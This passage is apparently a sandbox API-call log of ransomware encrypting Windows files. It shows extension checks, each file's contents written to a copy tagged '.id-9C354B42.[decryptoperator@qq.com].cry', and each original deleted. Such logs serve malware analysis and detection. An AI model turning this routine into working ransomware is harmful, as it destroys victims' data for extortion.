(lpString=".rar") returned 4 [0043.923] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.923] lstrlenW (lpString=".bz2") returned 4 [0043.923] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.923] lstrlenW (lpString=".7z") returned 3 [0043.924] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString=".dbf") returned 4 [0043.924] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString=".1cd") returned 4 [0043.924] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString=".jpg") returned 4 [0043.924] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString=".doc") returned 4 [0043.924] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.924] lstrlenW (lpString=".docx") returned 5 [0043.924] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.924] lstrlenW (lpString=".pdf") returned 4 [0043.924] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.924] lstrlenW (lpString=".xls") returned 4 [0043.924] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.924] lstrlenW (lpString=".xlsx") returned 5 [0043.924] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.924] lstrlenW (lpString=".ppt") returned 4 [0043.924] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString=".zip") returned 4 [0043.924] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.924] lstrlenW (lpString=".rar") returned 4 [0043.924] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.924] lstrlenW (lpString=".bz2") returned 4 [0043.924] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.924] lstrlenW (lpString=".7z") returned 3 [0043.924] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString=".dbf") returned 4 [0043.924] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.924] lstrlenW (lpString=".1cd") returned 4 [0043.925] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.925] lstrlenW (lpString=".jpg") returned 4 [0043.925] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.925] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0043.925] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.925] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.933] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=2181) returned 1 [0043.933] CloseHandle (hObject=0x1b8) returned 1 [0043.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 0x20 [0043.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.933] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.933] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0043.935] GetLastError () returned 0x0 [0043.935] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x885, lpOverlapped=0x0) returned 1 [0043.955] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x890, lpOverlapped=0x0) returned 1 [0043.956] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.956] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.956] SetEndOfFile (hFile=0x1bc) returned 1 [0043.956] CloseHandle (hObject=0x1bc) returned 1 [0043.956] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.956] SetEndOfFile (hFile=0x1b8) returned 1 [0043.957] CloseHandle (hObject=0x1b8) returned 1 [0043.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0043.957] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 1 [0043.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.957] lstrlenW (lpString=".doc") returned 4 [0043.957] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.957] lstrlenW (lpString=".docx") returned 5 [0043.957] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.957] lstrlenW (lpString=".pdf") returned 4 [0043.958] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString=".xls") returned 4 [0043.958] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString=".xlsx") returned 5 [0043.958] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.958] lstrlenW (lpString=".ppt") returned 4 [0043.958] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.958] lstrlenW (lpString=".zip") returned 4 [0043.958] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString=".rar") returned 4 [0043.958] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString=".bz2") returned 4 [0043.958] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.958] lstrlenW (lpString=".7z") returned 3 [0043.958] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.958] lstrlenW (lpString=".dbf") returned 4 [0043.958] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.958] lstrlenW (lpString=".1cd") returned 4 [0043.958] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.958] lstrlenW (lpString=".jpg") returned 4 [0043.958] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.958] lstrlenW (lpString=".doc") returned 4 [0043.958] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.958] lstrlenW (lpString=".docx") returned 5 [0043.958] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.958] lstrlenW (lpString=".pdf") returned 4 [0043.958] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString=".xls") returned 4 [0043.958] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.958] lstrlenW (lpString=".xlsx") returned 5 [0043.958] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.959] lstrlenW (lpString=".ppt") returned 4 [0043.959] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.959] lstrlenW (lpString=".zip") returned 4 [0043.959] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.959] lstrlenW (lpString=".rar") returned 4 [0043.959] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.959] lstrlenW (lpString=".bz2") returned 4 [0043.959] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.959] lstrlenW (lpString=".7z") returned 3 [0043.959] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.959] lstrlenW (lpString=".dbf") returned 4 [0043.959] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.959] lstrlenW (lpString=".1cd") returned 4 [0043.959] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.959] lstrlenW (lpString=".jpg") returned 4 [0043.959] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.959] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0043.959] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.959] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1560) returned 1 [0043.960] CloseHandle (hObject=0x1b8) returned 1 [0043.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 0x20 [0043.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.960] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.960] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0043.961] GetLastError () returned 0x0 [0043.961] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x618, lpOverlapped=0x0) returned 1 [0043.969] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x620, lpOverlapped=0x0) returned 1 [0043.971] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.971] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.971] SetEndOfFile (hFile=0x1bc) returned 1 [0043.971] CloseHandle (hObject=0x1bc) returned 1 [0043.971] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.971] SetEndOfFile (hFile=0x1b8) returned 1 [0043.972] CloseHandle (hObject=0x1b8) returned 1 [0043.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0043.972] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 1 [0043.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.972] lstrlenW (lpString=".doc") returned 4 [0043.972] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.972] lstrlenW (lpString=".docx") returned 5 [0043.973] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.973] lstrlenW (lpString=".pdf") returned 4 [0043.973] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.973] lstrlenW (lpString=".xls") returned 4 [0043.973] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.973] lstrlenW (lpString=".xlsx") returned 5 [0043.973] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.973] lstrlenW (lpString=".ppt") returned 4 [0043.973] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.973] lstrlenW (lpString=".zip") returned 4 [0043.973] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.973] lstrlenW (lpString=".rar") returned 4 [0043.973] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.973] lstrlenW (lpString=".bz2") returned 4 [0043.973] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.973] lstrlenW (lpString=".7z") returned 3 [0043.973] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.973] lstrlenW (lpString=".dbf") returned 4 [0043.973] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.973] lstrlenW (lpString=".1cd") returned 4 [0043.973] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.974] lstrlenW (lpString=".jpg") returned 4 [0043.974] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.974] lstrlenW (lpString=".doc") returned 4 [0043.974] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.974] lstrlenW (lpString=".docx") returned 5 [0043.974] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.974] lstrlenW (lpString=".pdf") returned 4 [0043.974] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.974] lstrlenW (lpString=".xls") returned 4 [0043.974] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.974] lstrlenW (lpString=".xlsx") returned 5 [0043.974] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.974] lstrlenW (lpString=".ppt") returned 4 [0043.974] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.974] lstrlenW (lpString=".zip") returned 4 [0043.974] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.974] lstrlenW (lpString=".rar") returned 4 [0043.974] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.974] lstrlenW (lpString=".bz2") returned 4 [0043.974] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.974] lstrlenW (lpString=".7z") returned 3 [0043.974] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.974] lstrlenW (lpString=".dbf") returned 4 [0043.974] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.974] lstrlenW (lpString=".1cd") returned 4 [0043.975] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.975] lstrlenW (lpString=".jpg") returned 4 [0043.975] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.975] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0043.975] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.975] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=33009) returned 1 [0043.975] CloseHandle (hObject=0x1b8) returned 1 [0043.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 0x20 [0043.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.976] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.976] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0043.976] GetLastError () returned 0x0 [0043.976] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x80f1, lpOverlapped=0x0) returned 1 [0044.010] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x8100, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x8100, lpOverlapped=0x0) returned 1 [0044.012] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.012] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.012] SetEndOfFile (hFile=0x1bc) returned 1 [0044.012] CloseHandle (hObject=0x1bc) returned 1 [0044.012] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.012] SetEndOfFile (hFile=0x1b8) returned 1 [0044.013] CloseHandle (hObject=0x1b8) returned 1 [0044.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.013] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 1 [0044.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.014] lstrlenW (lpString=".doc") returned 4 [0044.014] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.014] lstrlenW (lpString=".docx") returned 5 [0044.014] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.014] lstrlenW (lpString=".pdf") returned 4 [0044.014] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.014] lstrlenW (lpString=".xls") returned 4 [0044.014] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.014] lstrlenW (lpString=".xlsx") returned 5 [0044.014] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.014] lstrlenW (lpString=".ppt") returned 4 [0044.014] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.014] lstrlenW (lpString=".zip") returned 4 [0044.014] lstrcmpiW 